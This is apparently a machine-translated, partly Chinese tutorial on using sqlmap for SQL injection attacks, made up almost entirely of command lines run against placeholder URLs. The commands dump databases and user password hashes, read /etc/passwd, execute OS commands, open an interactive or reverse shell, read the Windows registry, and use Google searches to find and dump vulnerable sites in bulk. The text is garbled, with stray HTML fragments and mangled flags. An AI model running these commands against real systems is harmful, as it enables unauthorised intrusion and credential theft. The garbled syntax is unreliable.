Security-Attack SQL injection (Sqlmap all issues)

The first step:

Sqlmap is based on Python, so first download:

Http://yunpan.cn/QiCBLZtGGTa7U Access Password c26e

Step Two:

Install Python and extract the sqlmap into the Python root directory;

Step Three:

Small trial Sledgehammer, view Sqlmap version:

Python sqlmap/sqlmap.py-h

Fourth Step:

Scan Web sites with SQL injection scanning tools to find URLs that suspect SQL injection problems;

Recommended Woodpecker! "Oo"

Fifth Step:

1. Basic information

" http://url/news?id=1 "

" http://www.xxoo.com/news?id=1 " --current-db #获取当前数据库名称

" http://www.xxoo.com/news?id=1 " " db_name "

 python sqlmap/sqlmap.py  -u  " Span style= "Color:rgb (128, 0, 0); >http://url/news?id=1  "--columns-t  " tablename  "  users-d  db_name  -v 0  #列字段   

" http://url/news?id=1 " " column_name " " table_name " " db_name " 0 #获取字段内容

2. Information content

Python sqlmap/sqlmap.py-u"http://url/news?id=1"--smart--level3--Users # Smart level performs test levels Python Sqlmap/sqlmap.py-u"http://url/news?id=1"--dbms"Mysql"--users # DBMS Specifies the database type
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--users #列数据库用户
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--dbs# Column Database
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--passwords #数据库用户密码
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--passwords-u root-v0#列出指定用户数据库密码
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--dump-c"Password,user,id"-T"TableName"-D"db_name"--start1--stop -#列出指定字段, listing 20 articles
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--dump-all-v0#列出所有数据库所有表
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--privileges #查看权限
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--privileges-u Root #查看指定用户权限
Python sqlmap/sqlmap.py-u"http://url/news?id=1"-- is-dba-v1#是否是数据库管理员
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--roles #枚举数据库用户角色
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--udf-inject #导入用户自定义函数 (Get system permissions!) ）
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--dump-all--exclude-sysdbs-v0#列出当前库所有表
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--union-cols #union query Table records
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--cookie"Cookie_value"#cookie注入
Python sqlmap/sqlmap.py-u"http://url/news?id=1"-B #获取banner信息
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--data"id=3"#post注入
Python sqlmap/sqlmap.py-u"http://url/news?id=1"-V1-F #指纹判别数据库类型
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--proxy"http://127.0.0.1:8118"#代理注入
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--string"String_on_true_page"#指定关键词
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--sql-shell #执行指定sql命令
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--file/etc/passwd
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--os-cmd=whoami #执行系统命令python Sqlmap/sqlmap.py-u"http://url/news?id=1"--os-shell #系统交互shell
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--os-pwn #反弹shell
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--reg-read #读取win系统注册表
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--dbs-o"Sqlmap.log"#保存进度
Python sqlmap/sqlmap.py-u"http://url/news?id=1"--dbs-o"Sqlmap.log"--resume #恢复已保存进度sqlmap-G"Google Grammar"--dump-all--batch #google搜索注入点自动 run out of all field attack instances
Python sqlmap/sqlmap.py-u"Http://url/news?id=1&Submit=Submit"--cookie="phpsessid=41aa833e6d0d28f489ff1ab5a7531406"--string="Surname"--dbms=mysql--users--password